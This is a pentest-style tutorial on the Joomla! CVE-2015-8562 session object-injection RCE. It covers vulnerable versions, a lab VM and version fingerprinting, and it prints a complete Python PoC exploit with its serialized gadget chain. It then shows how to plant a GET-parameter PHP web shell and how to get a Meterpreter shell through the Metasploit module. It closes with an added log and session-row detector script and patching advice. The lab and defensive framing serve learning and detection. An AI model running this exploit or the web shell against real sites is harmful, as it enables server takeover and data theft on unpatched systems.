Introduction:
A critical remote code execution (RCE) vulnerability, tracked as CVE-2015-8562, was discovered in Joomla! websites. It is making a lot of noise for the following reasons.
- Attackers started exploiting it before the public disclosure, i.e. it was a 0-day in the wild.
- It is very easy to exploit.
- Almost all versions of Joomla! are vulnerable, under certain conditions (see below).
What is this vulnerability?
At its core, this is an input validation issue that leads to PHP object injection. Joomla! stores the raw User-Agent and X-Forwarded-For request headers in the visitor's session, and the session is serialized and written to the database. An attacker who places a specially crafted serialized PHP object in one of those headers gets it deserialized when the session is read back on the next request, and a chain of existing Joomla! classes (the "gadget chain") turns that into code execution. A detailed analysis has already been published by Sucuri (see the references), so let's not re-invent the wheel.
Who is vulnerable?
All Joomla! releases from 1.5.0 up to and including 3.4.5 are vulnerable; 3.4.6 is the fixed version. Exploitation additionally depends on the PHP version on the server: it works on PHP builds older than 5.4.45, 5.5.29 and 5.6.13 respectively (these releases tightened PHP's session deserialization), and on older branches such as 5.3 that never received that fix.
Lab Setup:
I have created a VM for the readers to get hands-on experience while reading this article. It can be downloaded from this link. So, if you want to get a taste of exploiting this vulnerability, download the VM before you proceed further. The login credentials for the VM are shown below.
Username: joomla
Password: joomla
The application is hosted at http://<ip address>/joomla/
Kali Linux is the attacker’s machine.
Information Gathering:
Let's gather some information about the target, as we do in a typical black-box pentest. Default Joomla! installations come with an administrator control panel at the /administrator/ path.
Finding out the Joomla! version:
One of the common ways to find the Joomla! version is to fetch the "/language/en-GB/en-GB.xml" language manifest and read its <version> element. Let's do it.
Metasploit also has a scanner for this (auxiliary/scanner/http/joomla_version); we can use that as well.
PHP Version:
Another important thing to check is the PHP version. As mentioned earlier, exploitation is only possible with PHP versions below 5.4.45, 5.5.29 and 5.6.13. We can use curl to find it: request only the response headers and look at X-Powered-By. Note that this header is present only when expose_php is On in php.ini; if it is missing, the check is inconclusive. Use -I (a HEAD request) rather than -X HEAD, which makes curl wait for a body that never arrives.
curl -sI http://<ipaddress>/joomla/
Exploitation:
As mentioned in the beginning, this vulnerability was being exploited before its public disclosure. The following is one of the first public exploits available online for it. Download links:
http://pastebin.com/PRiK0SWL
(or)
https://www.exploit-db.com/exploits/38977/
'''
Simple PoC for Joomla Object Injection.
Gary @ Sec-1 ltd
http://www.sec-1.com/
'''
import requests  # easy_install requests (or: pip install requests)


def get_url(url, user_agent):
    # First request: obtain a session cookie. Joomla stores the User-Agent in
    # that session, which is how the payload reaches the database.
    headers = {
        'User-Agent': user_agent
    }
    cookies = requests.get(url, headers=headers).cookies
    # Follow-up requests with the same cookie make Joomla read the session
    # back, unserialize the injected object and run the gadget chain.
    for _ in range(3):
        response = requests.get(url, headers=headers, cookies=cookies)
    return response


def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
    return encoded[:-1]


def generate_payload(php_payload):
    # Wrap the PHP in eval() built from chr() calls, so the payload carries no
    # quotes that would break the serialized string it is embedded in.
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
    # Invalid 4-byte UTF-8 sequence: MySQL cuts the session row here, so the
    # rest of Joomla's own session data never reaches the database.
    terminate = '\xf0\xfd\xfd\xfd'
    # "}" closes the truncated __default item; "__test|" starts a second
    # session item, which the old PHP session decoder goes on to unserialize.
    # The literal \0\0\0 text (hence the raw strings) is what Joomla's database
    # session storage maps back to the NUL-prefixed protected property name.
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    # cache_name_function = "assert" makes SimplePie call assert(<feed_url>),
    # i.e. evaluate the payload, when the database driver's disconnect handler
    # runs SimplePie::init().
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
    return exploit_template


pl = generate_payload("system('touch /tmp/fx');")
print(get_url("http://172.31.6.242/", pl))
It is a PoC exploit which runs touch /tmp/fx on the target server, i.e. it creates a file inside the "/tmp" folder.
To test this exploit, just modify the last line with your target application's URL.
If you are using the VM provided, it should be "http://<IP Address>/joomla/".
Then run it:
python joomla_poc.py
This should create a new file with the name "fx" inside the "/tmp" folder on the target system.
Next, change the PHP payload passed to generate_payload() so that it writes a file named "shell.php" into the web root with the following content.
<?php
phpinfo();
?>
Now, access the file "shell.php" in the browser to see if it was created.
Let's add another file to get a shell on the server. Modify the exploit's PHP payload so that it writes the following file instead.
<?php
$cmd=$_GET['cmd'];
echo system($cmd);
?>
Let's use our shell now: request the file with the command to run in the cmd query parameter.
Note: For demonstration purposes, I am writing directly into the web server's document root, but that may not be possible in every case, for example when the target directory is not writable (the VM is a default installation and I did not add any explicit write permissions). It is not hard to work around this, since there are many other ways to turn code execution into an interactive shell. You may check this link for more details.
While you are running the exploit from your attacking machine, fire up Wireshark and capture the packets on your working interface (in my case, eth1, the host-only adapter) to see what happens on the wire when you run this exploit.
Exploitation with Metasploit:
As usual, Metasploit has released an exploit for this (exploit/multi/http/joomla_http_header_rce) and made our lives easier. If your installation does not have it yet, you first need to add the module to your Metasploit framework in order to follow the steps.
If you don't know how to add it, here's how.
- Download the exploit into your Kali machine from this link (the raw GitHub URL is in the references).
- Copy it to "/usr/share/metasploit-framework/modules/exploits/multi/http/".
- Open up your Metasploit console and type "reload_all".
Once you set all the required options and run the module, you should see a Meterpreter shell popping up.
Note: I deleted all the content from the "joomla_session" table before running Metasploit so we can see how it is exploiting the target.
In the VM provided, the MySQL credentials are as follows.
Username: root
Password: toor
"joomla_session" is the table which holds the session data; the "data" column, to be precise. After a run of the exploit, the affected row contains the injected User-Agent as a second session item following Joomla's own "__default" item.
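Added example, not from the original article or from Joomla!: the injected User-Agent ends up as a second "|"-delimited item inside joomla_session.data, and the same string appears in the web server's access log (and in the Wireshark capture above), so both are places to hunt for this attack after the fact. The Python 3 script below scans constructed session rows and a constructed Apache combined-format log line for the indicators. The sample rows and log lines, including the shortened payload with a placeholder eval(chr(49)) body, are made up for the example and mirror what the PoC above sends; the script assumes the log file is read with latin-1 so the 4-byte UTF-8 terminator survives as four characters.

```python
"""Find CVE-2015-8562 injection attempts in joomla_session rows and Apache logs.

Added example, not part of the original article or of Joomla!. The rows and
log lines at the bottom are constructed to mirror what the PoC sends.
"""
import re

# PHP's session serializer writes items as  name|<serialized value>.
# Joomla writes exactly one item, "__default"; a second item name right
# after a closing brace, followed by a serialized object, is the injection.
INJECTED_ITEM = re.compile(r'\}\s*([A-Za-z_]\w*)\|O:\d+:"([^"]+)":')

# Any serialized object. Joomla's own session data never contains one
# inside the browser / forwarded-for fields.
SERIALIZED_OBJECT = re.compile(r'O:\d+:"([A-Za-z_][A-Za-z0-9_\\]*)":')

# Classes chained by the public exploits.
GADGET_CLASSES = {"JDatabaseDriverMysqli", "JDatabaseDriverMysql",
                  "JSimplepieFactory", "SimplePie"}

# 4-byte UTF-8 sequence the exploits append so that MySQL truncates the row
# (compared here as four Latin-1 code points; read logs with latin-1).
TRUNCATION_MARKER = "\xf0\xfd\xfd\xfd"

APACHE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r"}
# Last quoted field of a combined-format line, honouring Apache's \" escapes.
COMBINED_UA = re.compile(r'"((?:[^"\\]|\\.)*)"\s*$')


def scan_session_data(data):
    """(injected items, gadget classes seen) for one joomla_session.data value."""
    items = [(m.group(1), m.group(2)) for m in INJECTED_ITEM.finditer(data)]
    seen = {m.group(1) for m in SERIALIZED_OBJECT.finditer(data)}
    return items, sorted(seen & GADGET_CLASSES)


def unescape_apache_field(field):
    """Undo Apache's log escaping: \\xHH for non-printable bytes, \\" and \\\\."""
    def repl(m):
        esc = m.group(1)
        if esc[0] == "x":
            return chr(int(esc[1:], 16))
        return APACHE_ESCAPES.get(esc, esc)
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', repl, field)


def user_agent_from_log_line(line):
    """User-Agent from an Apache combined-format line, or None."""
    m = COMBINED_UA.search(line.rstrip("\r\n"))
    return unescape_apache_field(m.group(1)) if m else None


def suspicious_user_agent(ua):
    """Gadget-independent indicators of an attempt; empty list = looks benign."""
    reasons = []
    if re.search(r'\}\s*\w+\|', ua):
        reasons.append("session item delimiter")
    if SERIALIZED_OBJECT.search(ua):
        reasons.append("serialized php object")
    if TRUNCATION_MARKER in ua:
        reasons.append("mysql truncation marker")
    return reasons


# Constructed joomla_session.data values. The second is what remains after the
# exploit: MySQL dropped everything from the 4-byte character onward, so the
# __default array is never closed, and the literal \0\0\0 text is how Joomla's
# database session storage represents the NUL bytes of a protected property.
# The feed_url body eval(chr(49)) is a harmless placeholder for the real payload.
CLEAN_ROW = ('__default|a:3:{s:15:"session.counter";i:1;'
             's:19:"session.timer.start";i:1450000000;'
             's:22:"session.client.browser";s:11:"curl/7.35.0";}')
INJECTED_ROW = ('__default|a:3:{s:15:"session.counter";i:1;'
                's:19:"session.timer.start";i:1450000000;'
                's:22:"session.client.browser";s:512:"'
                '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";'
                'O:17:"JSimplepieFactory":0:{}'
                's:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;'
                'O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}'
                's:8:"feed_url";s:40:"eval(chr(49));JFactory::getConfig();exit";'
                's:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;'
                's:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}'
                's:13:"\\0\\0\\0connection";b:1;}')

# Constructed Apache combined-format lines; Apache escapes quotes as \" and
# non-printable bytes as \xHH, which is how the terminator shows up on disk.
LOG_LINE = ('10.0.2.4 - - [14/Dec/2015:10:21:33 +0000] "GET /joomla/ HTTP/1.1" 200 5132 '
            '"-" "}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";'
            'O:17:\\"JSimplepieFactory\\":0:{}}\\xf0\\xfd\\xfd\\xfd"')
BENIGN_LINE = ('10.0.2.4 - - [14/Dec/2015:10:20:01 +0000] "GET /joomla/ HTTP/1.1" 200 5132 '
               '"-" "Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0"')

if __name__ == "__main__":
    print("session rows:", scan_session_data(CLEAN_ROW), scan_session_data(INJECTED_ROW))
    for line in (LOG_LINE, BENIGN_LINE):
        print("log:", suspicious_user_agent(user_agent_from_log_line(line)))
```

The session-row check is the reliable one, since it sees exactly what PHP will unserialize; the log check is cheaper to run over months of history, and its three indicators do not depend on the particular gadget classes, so a payload rewritten around other Joomla! classes still trips it.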
What to do now???
If you own a Joomla! website, go and check whether it is vulnerable. You can use the following online service.
https://scan.patrolserver.com/joomla/CVE-2015-8562
If it is vulnerable, it is time to patch it.
How to patch:
Joomla versions 1.5.x and 2.5.x (EOL)
If you are using the old and unsupported versions 1.5.x or 2.5.x, you have to apply the hotfixes released by the Joomla! development team.
1.5.x: Session Fix Joomla 1.5.x
2.5.x: Session Fix Joomla 2.5.x
Joomla versions 3.x
Update immediately to version 3.4.6.
Note: These workarounds have been taken from the above-mentioned online scanning website (https://scan.patrolserver.com/joomla/CVE-2015-8562).
References:
https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html
http://pastebin.com/PRiK0SWL
https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/joomla_http_header_rce.rb